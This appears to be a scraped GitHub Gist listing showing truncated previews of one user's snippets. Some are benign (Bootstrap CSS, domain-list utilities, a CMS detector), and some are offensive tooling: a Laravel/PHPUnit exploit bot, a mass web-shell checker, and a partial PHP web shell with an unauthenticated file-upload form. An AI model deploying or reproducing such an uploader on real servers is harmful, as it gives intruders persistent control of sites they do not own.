Skip to content

Instantly share code, notes, and snippets.

/*!
* Bootstrap v3.1.1 (http://getbootstrap.com)
* Copyright 2011-2014 Twitter, Inc.
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
*/
/*! normalize.css v3.0.0 | MIT License | git.io/normalize */
html {
font-family: sans-serif;
-webkit-text-size-adjust: 100%;
@galehrizky
galehrizky / app.css
Created April 3, 2022 17:45
app.css
body {
background-color: #F3F3F3;
background-image: url('https://logopond.com/logos/0cb6fc61036210ec3136896918b7ee28.png');
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center;
}
.aestorepanel {
background-color: transparent;
}
@galehrizky
galehrizky / scanner.go
Last active February 7, 2022 18:09
Backdoor scanner server
// Created by galehdotid
// 2022-02-08
// wget -O file.go https://gist.githubusercontent.com/galehrizky/7d0947ebc204a8766371d62602632549/raw/0bb4c2feefe0cea40c6fcab630948102c7e9c29e/scanner.go
// go build file.go
// ./file -dir
package main
import (
"flag"
@galehrizky
galehrizky / remove_path_url_python.py
Last active September 7, 2020 21:55
Python Script
# ======================================================
# Change the author name don't make you become a coder
# contact : galehrizky@xaisyndicate.id
# Priv8 tools
# requirement : python3
# use : python3 clear_url.py
# @2020 galehdotid | fb.com/hax0rtersakiti
# =======================================================
import os,time
from concurrent.futures import ThreadPoolExecutor
@galehrizky
galehrizky / laratech.py
Created July 24, 2020 00:44
Bot Automation detect debug mode laravel & PHP UNIT Exploit
# ======================================================
# Change the author name don't make you become a coder
# contact : galehrizky@xaisyndicate.id
# Priv8 tools
# requirement : python3
# use : python3 laravel.py
# @2020 galehdotid | fb.com/hax0rtersakiti
# =======================================================
@galehrizky
galehrizky / remove.php
Created July 21, 2020 13:08
Remove Duplicate Domains
<?php
// duplicate domain remove
// coded by galehdotid
// set name file to domain.txt
// run php remove.php
// enjoy and still wait
ini_set('memory_limit', '8192M');
<?php
echo 'System: <font color="black" id="system_info">galehdotid#'.php_uname().'#</font><br>';
echo"<br><form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>";
if($_POST["k"]==upload) {
if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])) {
echo"<b>".$_FILES["f"]["name"];
} else {
echo"<b>Gagal upload cok";
@galehrizky
galehrizky / detect_cms.py
Last active July 4, 2020 04:18
Detect CMS & Framework
# ======================================================
# Change the author name don't make you become a coder
# contact : galehrizky123@xaisyndicate.id
# requirement : python3
# use : python3 detect_cms.py
# @2020 galehdotid | fb.com/hax0rtersakiti
# =======================================================
import requests,time,os,sys,re
@galehrizky
galehrizky / domain_generator.php
Created June 16, 2020 17:06
Domain Generator
<?php
// Generate list Domain Names
error_reporting(0);
function save($sites, $filename)
{
$file = fopen($filename,"a");
fwrite($file, "\n". $sites);
fclose($file);
<?php
# Coded by galehdotid
# fb : https://www.facebook.com/hax0rtersakiti
# Mass WebShell check & SSL check
# Usage : php file.php list.txt
error_reporting(0);
function has_ssl( $domain ) {
$res = false;